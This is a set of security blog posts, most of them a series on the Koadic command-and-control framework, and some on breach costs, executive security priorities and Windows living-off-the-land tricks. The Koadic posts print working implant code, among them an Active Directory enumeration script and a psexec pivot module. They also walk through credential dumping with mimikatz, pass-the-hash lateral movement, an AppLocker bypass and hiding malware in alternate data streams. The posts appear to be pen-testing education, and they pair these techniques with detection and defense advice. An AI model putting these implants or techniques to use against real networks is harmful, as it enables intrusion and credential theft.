All posts by Andy Green

Koadic: Implants and Pen Testing Wisdom, Part III

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver Javascript malware implants to the target and then interact with them from the comfort of your console.

Sure there’s a learning curve to understanding the way the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python shell (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you need to code up these two parts. And that’s all you need to know. Not quite. I’ll get into some more details below.

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant to list AD members for a given group. It seemed like something I can do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never coded the JavaScript to access Active Directory, you’ll find oodles of online examples on how to set up a connection to a data source using the ADODB object — for example this tutorial. The trickiest part is fine tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider="ADsDSOObject";
objConnection.Open("Active Directory Provider");
objCommand = new ActiveXObject( "ADODB.Command");


Koadic.work.report("Gathering users ...");
strDom = "<LDAP://"+strDomain+">";
strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users,"+strDomain+"))";  //Koadic replaces ~GROUP~ with info field
strAttributes = "ADsPath";

strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText=strQuery;

objRecordSet = objCommand.Execute();
objRecordSet.Movefirst;
user_str="";
while(!(objRecordSet.EoF)) {

  user_str +=objRecordSet.Fields("ADsPath").value;
  user_str +="\n";
  objRecordSet.MoveNext;
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted from an existing Koadic implant, which I’m calling enum_adusers. You can view a part of my implant below.

import core.implant
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()
    def display(self):
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            save_file = "/tmp/loot."+self.session.ip+"."+uuid.uuid4().hex
            with open(save_file, "w") as f:
              f.write(self.data)
            self.shell.print_good("Saved loot list to "+save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class, in particular the print methods. Under the hood, Koadic is scooping up the data sent by the JavaScript code’s report function, and displaying it to the console.

By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this, partially to inspire you to roll your own implants. But also to make another point. The underlying techniques that Koadic relies on —  rundll32 and mshta — have been known about by hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses

Let’s say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this,“ Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling you’ll learn that Windows Internet security controls has a special setting to allow browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure that this was disabled for my server instance, which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant to pull in AD users to work.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy product for letting you run HTML for internal business apps.

The real pen testing wisdom I gained is that if this particular script runs, it means that the remote data source security control is enabled, which is not a good thing, even and perhaps especially on a server.

Next time, I’ll be wrap up this series, and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.

CEO vs. CSO Data Security Mindsets, Part I

CEO vs. CSO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks Wade —  behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap, and try to get everyone on the same page. (And after that I’ll take on  world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CSOs and board subjects to rate the value of cybersecurity to their business in five different categories: security guidance, business enabler, loss avoidance, data protection, and brand protections (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated by under 30% of CSOs, but over 80% of board members as valuable. Maybe, I’m a crazy idealist, but you’d think that would be job #1 for CSOs!

The explanation from Cyentia on this point is worth noting: “CSOs of course knows that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — not just providing a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers. Although that belief is not shared equally by the board — only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at  less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can have serious reputational damage, leading to lost sales and law suits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cynentia has identified an enormous gap between what CSOs think is important versus the board regarding the value of cybersecurity. This leads nicely to another result of theirs related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source:Cyentia Institute)

Cyentia tells us there’s approximately a balance between both sides for many of the IT metrics. However, there’s a large gap between CSOs and boards over the the importance of “risk posture” metrics. It’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad an outcome of a breach, or insider attack, or accidental disclosure can reach in dollars, and the frequency or probability that these events could happen.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this years RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested in both rare cybersecurity events that incur huge losses – think Equifax – and more likely events but that typically have far lower costs – spam mail, say, to get corporate credit card numbers use in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which is basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.

 

 

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have been long known to hackers. If you take a peek at Mitre’s ATT&CK database, you’ll see that rundll32 has been the basis for attacks stretching over years. Pen-testing tools, such as Koadic, have formalized established hacking wisdom, thereby helping IT people (and bloggers) to understand threats and improve defenses.

I’ll add that it makes sense to also take a deeper dive into Koadic’s design to gain even more insights into possible defense strategies. With that in mind, let’s go over a few ideas from last time.

Playing Pen Tester (and Blue Teamer)

We saw how Koadiac, like all command and control or C2 servers, lets us send commands from its console to the targeted computer on which a small-footprint JavaScript shell (more on that below) launches the actual Windows commands.

As a pen tester, one of the first things you want to learn is whether there’s interesting data that you can access and then copy or exfiltrate. For my pretend AWS environment, you can see below how I used legacy findstr to zoom into a file containing sensitive data.

I then used implant/util/download_file to bring it back home.

Switching to my “blue team” persona, let’s now take a quick look at the Windows Event logs.

To begin to understand what’s happening, I enabled very granular logging. I was doing this for educational purposes — and isn’t this what pen testing is about? —  but you may not be able to depend on detailed logs in real-world post-exploitation analysis. However, as we’ll soon see, Koadic does leak information into the file world — it’s not completely fileless. And this provides an opening for a different kind of defense.

The first interesting log entry is one showing rundll32 pulling in a remote script – which I discussed back in my LoL series. This is not, clearing throat, a standard use of this utility, and should raise flags. By the way, Windows Defender (in Windows 10) can spot some of the dark uses of this LoL-ware.

And then a little further on in the log is this revealing entry:

This should raise suspicions: indirect execution of a command coupled with redirection of output.

Of course, this is the result of the findstr command that I previously sent to my zombie. The larger point is that it’s being run indirectly  via the launching of a cmd shell to then run findstr. It’s actually what happens when you run a shell command within JavaScript: you use ActiveX to create a shell session and then pass it the command, something like this:

var r = new ActiveXObject("WScript.Shell").Run("finstr /I private C:\VIPs");

 

Did you notice the 1> and  2>1& part of the command in the log entry? Those of us of a certain vintage immediately recognize that it’s Unix/Linux for directing standard output to a file and redirecting standard error to standard output.

Sure, there are legit reasons for doing all this, but it’s also the way you would relay output from a command (launched by malware) back to the hacker’s attacker server —save it to a file, read the file, and then delete it. This is in fact what Koadic does.

Detailed event logging, though potentially containing useful information, may not be always be available. But it doesn’t matter! If you can relate these short burst of file creation and deletion activity with access to executable files that are rarely visited by the user, such as rundll32, and the copying of files containing sensitive information, then you’re on the way to detecting and stopping an attack.

In short: there’s a little bit of file noise often generated by malware that can be detected by those security defenses that are capable of monitoring abnormal file activity on a user basis.

Real-World Pivots With Koadic

Last time, I began to show you how to configure Koadic for a lateral move or pivot. Let’s finish this up and do a real pivot.

Assuming there are other domain credentials available, Koadic provides the implant/inject/mimikatz_dynwrapx module to pull out the cached hashes and, when possible, actual passwords. If you then enter the creds command, you can reference the credentials using a numeric identifier.

With Koadic’s credential id number, I can pass the hash (or password) to psexec.

Let’s assume I’ve learned that masa is another server in the acme.corp domain, and that I’m using the credentials of the user named lex. I’m now ready to run implant/pivot/exec_psexec.

I set the pathname to the psexec executable, which I previously uploaded, provided the credid of lex’s credential, and for the remote command to execute, I supplied the initial mshta stager that landed me on the victim’s computer. You leapfrog to the next computer by simply implanting another Koadic Javascript client.

That should have been enough to get this started.

But  …  Koadic didn’t seem to properly pull out the fully qualified domain name of the credential from the cache, so I had to tweak the JavaScript code.  I was forced to override the cached domain information through whatever was explicilty configured through the set command.

My headaches didn’t end there: my lateral move was initially blocked. Psexec experts probably know this, but I learned the hard way that you have to provide the –h option for “elevated credentials” (even if aleady have the plaintext password).  More code changes.

Pivoting with Koadic: same mshta stager, different target.

On the bright side, Koadic’s script-based environment makes code updates relatively painless. Note to Sean and Zach: I think you need to take a closer look at the exec_psexec implant.

Once psexec runs successfully with the mshta payload, Koadiac establishes another zombie. (Yes, that’s quite a sentence.)

I now had two zombies: one controlling pepper.corp.acme, my initial target, and the second one handling masa.corp.acme. I’m now a zombie master!

To communicate with the new zombie, I just needed to make sure I set the appropriate zombie number, and then run the command. You can see my zombie sorcery below:

I now control two zombies! How many can make that same boast?

Diving Into the Koadic Kode and Kraziness

I will be merciful and end this post soon enough! Before we break until next time, I wanted to start a dive into Koadic’s architecture. It’s helpful – I think –in terms of really understanding your pen testing and in getting insights into real-world post-exploitation malware.

The one word that describes the Koadic (and other malware creations) is obfuscatory. There’s nothing straightforward to the way it runs commands. Some of this is intentional to throw off the defense, but C2 environment are also inherently complicated.

I’ll go into this in more detail next time, but here’s the $.10 tour.

The mshta stager that pulls in the initial payload doesn’t hang around very long. It then launches rundll32, which loads the main Koadic client code. At this point, the client is in a loop waiting for commands from the Koadic server – the client console that I showed above.

Showing a small part of the client-side JavaScript pulled in by rundll32. You can see the code for launching a Windows command sent from the Koadic C2 server. Note the encasing HTA.

Once it receives a command, say to execute “ipconfig”, the client-side of Koadic acts like a Unix/Linux shell — forking and execing commands. In our case, the Koadic client then launches another rundll32 whose sole function is to connect back to the Koadic server and pull in specially served up JavaScript — essentially the ActiveX code to launch a Windows shell session to run ipconfig. This child rundll32 is transient, exiting after it completes its execution of  a single command and leaving  the parent rundll32 to carry out the next commands.

Basta, for now!

If you’re looking for a homework assignment, you should study this section of the Koadic’s github. Hint: stdlib.js forms the core of the Koadic client.

 

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Par...

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I

In my epic series on Windows binaries that have dual uses– talkin’ to you rundll32 and mshta — I showed how hackers can stealthy download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the land (LoL) approach for post-exploitation. Enter Koadic.

I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show up. The search results led me to the Koadic post-exploitation rootkit, which according to its description “does most of its operation using Windows Script Host.” I was intrigued. By the way, Koadic is hacker-ese for COM Command and Control.

A good starting point for learning about Koadic is a Defcon presentation given by its two developers, Sean Dillon and Zach Harding. Koadic looks and acts like PowerShell Empire with script-based stagers and implants. The key difference, though, is that Koadic instead relies on JavaScript and VBScript on the victim’s computer.

As they note in their presentation, IT defenders are now more attuned to the fact that PowerShell can be used offensively. In other words, security teams are looking for unusual PS activity in the Windows event logs. They are not as focused (yet) on scripts run by the Windows Script Host engine. And that was some of the inspiration behind Koadic, which I suppose can be called JavaScript Empire.

Microsoft has also helped matters by adding PowerShell-only logging modules, a topic I explored in my amazing mini-series on obfuscation techniques.

Defenders can selectively turn on PS logging. They can not do the same for JavaScript.

To log scriptware (other than PowerShell), Windows forces you to enable auditing of every process launched. Eeeks.

To analyze Koadic’s script activity, you have to bite the bullet and enable detailed logging, which results in an entry for each process launched in Windows. Let’s just say the Windows log ain’t a pretty place after that’s done, and this event fog helps hide Koadic’s activities.

Start Me Up With a Mshta Stager

Thankfully, I had malware analysis help from our amazing NYC-based summer intern, Daniel Vebman, who sanity checked my ideas and did some valuable exploring of his own.

In this first post, let’s take a shallow dive into Koadic’s capabilities and architecture. One of the major themes to keep in mind with Koadic is that its script-based approach gives the attackers the ability to change code on the fly, and adapt quickly to new environments.

How do you detect stealthy post-exploitation activities of Koadic-style attacks in the real world? I’ll come to that later on in the series, but clearly you’ll need to move beyond the Windows event log and, ahem, focus on the underlying file system.

To get started, we installed the software from Github on an Ubuntu instance in our AWS environment. We hit a few snags  but this was quickly solved by the ever-resourceful Daniel, who reinstalled Koadic’s Python modules (and did it right).

Yes, the server-side of Koadic is Python-based.

To do its work, Koadic leverages Windows binaries that sneakily pull in remote JavaScript or VBScript. Essentially, the ones I covered in my living-off-the land series: mshta, rundll32, and regsvr32.  It appears, though, from reading the notes that only mshta works, so that’s the stager we used in our testing.

Let’s assume the mshta stager was delivered to a victim via, say, a phish mail. Once activated, Koadic then creates a “zombie”. It’s their way of saying it has control over the victim’s machine. The zombification — it’s a word — is accomplished through a library of JavaScript-based implants.

Night of the Koadic Zombie!

In a realistic pen-testing scenario, the first task is to answer the who and where questions. After all, the payload has landed somewhere on laptop or server of a random user in the Intertoobz.

Koadic’s implant/manage/exec_cmd does as advertised: lets you run individual shell commands remotely. As with all the implants, you enter the “info” command to see what the basic parameters are and then set them accordingly.

Who am I? Where am I? All of life’s and pen-tester’s basic questions can be answered by running shell commands remotely.

For exec_cmd, I had my zombie execute whoami, hostname, and ipconfig on my pretend victims’ computer — a Windows Server 2012 in my AWS instance.

Let’s Look Around

Once you have the basics, it’s then helpful to discover the full qualified domain name (FQDN) of the Windows environment you’ve landed in. As we’ll see, you’ll need the domain name to move off the initially hacked computer.

For that I need to resort to PowerShell by setting the cmd parameter to GetHostByName($env:computerName). It’s a benign PS cmdlet, so in theory it shouldn’t raise any eyebrows if it’s logged.

Getting the domain name through a PowerShell cmdlet.

What about scanning the network to learn about IP addresses?

That’s where implant/scan/tcp comes into play. There’s also the implant/gather/user_hunter  to discover users who are currently logged in.

In short: Koadic has built-in support for getting essential environmental information and, of course, the ability to run shell commands to fill in the gaps. By the way, a description of all its commands can be found on the Github home page.

Doing the Psexec Pivot

Unless a hacker is very lucky and lands on a server that has millions of unencrypted credit card numbers, she’ll need to leapfrog to another computer. The way this is done is to harvest domain-level credentials, eventually find one that has elevated permissions, and then perform a lateral move.

Once upon a time, I wrote about how to use mimikatz and psexec do just that. Koadic has conveniently provided a mimikatz-based implant to retrieve credentials from SAM memory and another one to support psexec. Small quibble: you have to explicitly upload the psexec executable to the victim’s computer and set the path name.

For example, to retrieve credentials I ran implant/inject/mimikatz_dynwrapx:

Koadic’s mimikatz dll shows NTLM hashes and even the password, thanks to the wdigest security hole.

You can see the NTLM hashes, which you can crack offline if need be. But because of the infamous wdigest security hole, you also get the plain text passwords. Eureka!

I won’t show how to do an actual lateral move or pivot in this post, but you can see the setup for the implant/pivot/psexec below:

By the way, you get the credid number from the creds command. It will automatically PtH for you!

I’ll explain next time how to do a real-word pivot by filling in the cmd parameter with the initial mshta stager, thereby creating another zombie. The idea is to continue the pattern of harvesting credentials with mimikatz and then pivoting. Yeah, you end up controlling an army of zombies. Evil!

A Little JavaScript Plumbing

That’s the quick $.50 tour of Koadic. One last bit of business is a high-level view of the architecture.

Koadic is essentially a remote access trojan or RAT. Nowadays, we give it the fancier name of a command and control (C2) server. In any case, the principles are easy enough to grasp: the client side executes the commands from the remote server.

In the case of Koadic, the client side is not a binary — as they were for the early RATs — but instead it’s 100% JavaScript. The client’s sole function is to loop and pull in remote implants—written in either JavaScript or VBScript — from Koadic’s Python-based server, run them, and send the results back.

By the way, there’s some clever programming in Koadic wherein the server-side Python crafts the actual JavaScript implant. I’ll get into more details further on in the series.

Let me draw back the curtain to remove some of the mystery around the implants. Here’s the raw JavaScript in Koadic that actually launches psexec:

try
  {
    var rpath = "~RPATH~"
    var UNC = "~RPATH~\\psexec.exe ";
    var domain = "~SMBDOMAIN~";
    var user = "~SMBUSER~";
    var pwd = "~SMBPASS~";
    var computer = "\\\\~RHOST~ ";
  

    UNC += computer;
  

    if (user != "" && pwd != "")
    {
        if (domain != "" && domain != ".")
        {
          user = '"' + domain + "\\" + user + '"';
        }
  

        UNC += "-u " + user + " -p " + pwd + " ";
    }
  

    UNC += " -accepteula ~CMD~";
  

    // crappy hack to make sure it mounts
    var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\~FILE~.txt");
  

    if (output.indexOf("Drive") != -1)
    {
      var drive = output.split(" ")[1];
      Koadic.shell.run("net use " + drive + " /delete", true);
    }
  

    Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true);
  

    Koadic.work.report("Complete");
  }
  catch (e)
  {
    Koadic.work.error(e);
  }

 

Yeah, those tilde encased variables are replaced with the real thing before it’s shipped off to the target system.

The key point is that this is a flexible environment. In fact, this infosec blogger (and former UNIX programmer) successfully made a few tweaks to the psexec data module to get it to work in our AWS environment.

Note to Shawn and Zach: I think there are issues in the way a fully qualified domain name is parsed by the mimikatz implant. Just sayin’.

For Next Time

I’ll cover this material again, and I’ll do an actual psexec pivot and get deeper into my pen-testing persona. I’ll also analyze the events produced by Koadiac so that we can see that it ain’t so easy to detect unusual activity from the raw logs.

One last thought: wouldn’t it be great for pen testing purposes if we were able to wangle Koadic to pull in Activity Directory information, say domain groups and their members? Kind of like what PowerView does.

Hold that thought, and next time we’ll also start on the task of creating our own implants. In the meantime, if you want to get ahead of the curve, you might want to study the Koadic modules in Github.

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Those of us in the infosec community eagerly await the publication of Ponemon’s annual breach cost analysis in the early summer months. What would summer be without scrolling through the Ponemon analysis to learn about last year’s average incident costs, average per record costs, and detailed industry breakdowns? You can find all this in the current report. But then Ponemon did something astonishing.

The poor souls who made it through my posts on breach costs stats learned that datasets used here are not normal. I mean that literally. They don’t correspond to a standard normal or bell curve. We also know from more in-depth studies that the data points are skewed with “heavy tails”, and are more accurately represented by power laws.

What does that have to do with Ponemon’s cost analysis?

Ponemon has avoided the issues of dealing with skewed data by lopping off the outliers — they don’t look at breach incidents above 100,000 records. Sure, you lose some information, but then the stats are more meaningful to the companies — most of them — that don’t live in the long tail of the curve.

Monster Breaches Are Costly. Very Costly.

Brace yourself. For 2018, Ponemon started looking at the dragon’s tail. They’ve included an analysis of mega data breaches involving incidents of over one million records.

First, let’s get the bad news out of the way. Since Ponemon only had 11 companies in their mega breach sample, they had to perform, gulp, a Monte Carlo analysis. That’s a fancy of way saying they were forced to make some guesses about a few of the parameters in their model, so they are randomly “sampled” to generate them.

The more important point is that in their graph below of breach costs vs. records stolen, the data points show a sub-linear or (more technically, a log-linear) relationship — the costs grow slower than a straight line. Double the number of records stolen, and the total breach cost is less than double.

Breach costs grow slower than a straight line. (Source: Ponemeon, 2018)

And that’s exactly what other researchers have seen with breach costs. I also pointed this interesting factoid out in my breach cost series — you can learn more here.

For CFOs and CIOs, there’s a drop of a good news in this slow growing curve.  It means that the cost per record drops as more records are involved.

For a data theft of 20 million records, the graph above indirectly tells us the average cost is about $18 per record, and at 50 million records, the per record cost decreases to about $7.

I suppose that may sound benign when quickly said in a presentation, but on the other hand … the total cost for a 50 million record theft is over $350 million.

And that’s something no board of directors wants to hear!

NetDiligence: Real-World Verification

While Ponemon’s theoretical analysis of mega breach costs is interesting, there is a dataset that sheds more light on real-world costs of these huge breaches. This comes to us courtesy of NetDiligence, a data risk analysis firm that has obtained access to actual claims data processed by cyber-insurance companies.

I looked at NetDiligence’s latest report for the period 2014 – 2017 period. It provides further validation that data breach costs at the high-end are, indeed, expensive.

According to NetDiligence, the average breach cost for the 591 claims in their dataset was about $394,000. They also calculated a median cost at a mere $56,000. Hmmm, with 50% of the data or 245 claims above $56K, there have to be monster incidents to explain the fact that average is about seven times higher than the median. This is the sign of a non-normal data set — the heavy-tailed curve that we typically see with breach stats.

I can do a quick back-of-the-envelope analysis to give you a better sense of mega costs lurking in the NetDiligence stats. Feel free to skip this next part if doing a multiplication with an average makes you slightly nauseous.

The total breach costs in the claims dataset is about $233 million (591 x 394,000). There’s a negligible amount of the total cost below the median – at most 56,000*246 or about $14 million. That leaves $219 million in costs above the median, which is then spread out over 245 claims. That means that the upper 50% has a  average cost of at least $890,000.

If you make some other assumptions – similar to what I did here — you quickly get to breach incidents in the millions of dollars for the top percentiles.

Anyway, NetDiligence doesn’t give away too many details about individual breach incidents in their analysis. But further down in the report, they reference some of the extreme costs in their claims dataset. This shows up in a table that breaks down costs by business size.

There are some monster incidents hidden in this table: $11 million, $15 million, and $16 million. (Source: NetDiligence)

If you look at the “Max” column, you can see that there are several incidents above $10 million. That ain’t chicken feed.

One Last Thing

It’s worth mentioning that Ponemon also includes indirects costs for incidents, which is based heavily on customer churn. This cost doesn’t show up in the cyber insurance claims because it’s based on hard costs —  legal fees, fines, credit monitoring, remediation efforts, etc.

In other words, Ponemon’s incident cost analysis will always trend significantly higher than the numbers from actual insurance claims. Ponemon’s costs numbers, though, are probably closer to a real-world cost, particularly for larger companies. And especially for public companies, where breach incidents can affect overall valuations. For example, Yahoo.

The key takeaway is that the headline-making breach incidents (Equifax, Yahoo, etc.) tell us about the very far end of the cost tail. The NetDiligence report in particular proves that there are still expensive data breaches, in the tens of millions of dollars, living in the middle of the tail.  And these are likely less publicized, and more typically experienced.

I’ll have more to talk about for both the Ponemon and NetDiligence reports in a future post.

 

 

 

 

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL S...

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips

When we left off last, I showed how it’s possible to run VBScript directly from mshta. I can play a similar trick with another LoL-ware binary, our old friend rundll32. Like mshta, rundll32 has the ability to evade the security protections in AppLocker. In other words, hackers can leverage a signed Windows binary to run handcrafted scriptware directly from a command line even though AppLocker officially prevents it. Evil.

Oddvar Moe, one of this blog’s favorite security bloggers, has studied the LoLs workarounds to AppLocker. In my own experimenting, I was able to confirm that rundll32 can avoid AppLocker’s security defenses.

For example, AppLocker blocked direct execution of a line of JavaScript to pop-up an alert message, but when I fed it the same one-liner directly into rundll32, it ran successfully

AppLocker is not perfect.

I also gave rundll32 slightly more complicated JavaScript that pulls in a remote object and execute it using GetObject. Similar to what I did last time with mashta. It ran flawlessly even though AppLocker disabled scripts.

AppLocker can’t stop rundll32 from running a remote COM object.

As before, I had enabled more granular auditing. I took a peek at the event logs, and thankfully Windows logs the complete command line when the JavaScript is passed directly to rundll32. That’s good news for security defenders.

You can turn on granular logging in Windows to see command line details. Beware: you’re flooded with event details.

Where Is This Going? Lol-Ware Post-Exploitation!

These LoL-ware binaries have incredible abilities to run scripts stealthily. And one would think that pen testers would be working out some post exploitation tools based on this idea. One of the advantage of using scripting languages other than PowerShell is that IT security groups are not necessarily focused on, say, JavaScript.

This was some of the inspiration behind Koadic, which is a command and control (C2) environment, or more familiar to us as a  remote access trojan or RAT. Kodiac allows security testers to open up a reverse shell, dump hashes, pivot using PtH techniques, retrieve files, and run arbitrary commands.

LoL and RAT had a love child, and they called it Koadic. Note the mshta stager.

In the above graphic showing the Koadic environment, you can see that it leverages mshta as a payload launcher to get a foothold on the target computer.

The idea is that the attacker takes the “stager” — the mshta code with the URL — and then embeds it, as we saw, directly in an HTA file or in an Office document’s macros that’s executed when opened.

I’ll be delving more deeply into Koadic in a future post. And I’ll be proving that a corporate IT security group is no match for a capable high-school student. Stay tuned.

Defense Anyone?

AppLocker can’t completely disable script execution. You can resort to simply turning off the Internet spigot by using Windows Firewall. I showed you how to block outbound traffic for a specific binary here.

For a more complete solution, you’ll need to go back to AppLocker, and exclude or blacklist the offending utilities from being executed by “ordinary users”. Something like what I did below, where I prevented users in the “Plain User” group from executing rundll32 while still allowing administrators:

Use AppLocker to exclude ordinary users from being able to run non-ordinary Windows binaries.

The harsh reality is that there really isn’t a fool-proof solution to LoL hackery. There will always be phish mails that allow attackers to get a foothold and then leverage existing Windows binaries.

In this series, we explored regsvr32, mstha, and rundll32. And while the LoL-techniques behind them are well known and defenses available, these binaries are still being successfully used by attackers, as this recent article proves.

And there are the unknown unknowns: new LoL techniques that the security world may not be aware of and are currently being tried.

What do you do?

This brings us back to a familiar theme of the IOS blog: the hackers will get in, and so you need secondary defenses.

This means categorizing your data, finding and putting more restrictive access rights on those data files that contain sensitive information to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams when the attackers access these files or exhibit unusual file access or creation activities.

Hold this thought! We’ll see that Koadic, though very clever, is not completely stealthy. It produces some noise, and it’s possible to detect a Kodiac-based attack even when it’s not directly accessing sensitive data.

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Str...

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the ancient type command. As it turns out, there are a few other Windows utilities that also let you copy into an ADS.

For example, extract, expand, and our old friend certutil are all capable of performing this ADS trick. For a complete list of these secret file-copying binaries, check out Oddvar Moe’s latest gist.

In my testing, I used extract to copy an evil Javascript malware into the ADS of a .doc file.

In the old command shell, dir /r shows you the ADS for each file.

Ready, Set, Launch

This brings up a larger point about Windows utilities: they can perform multiple functions — some of them less well known than others. In fact, the aforementioned utilities listed by Oddvar are all capable of a normal file copy as well as the ADS variant.

This is not a revelation in itself. However, it does means that security monitoring software that’s trying to detect, say, an unusual file copy or transfer can’t just rely on searching the Windows Event logs for a “copy” in the command line. Living-off-the-land (LoL) is all about trickery and making it harder for the defense to understand their IT systems are even under an attack.

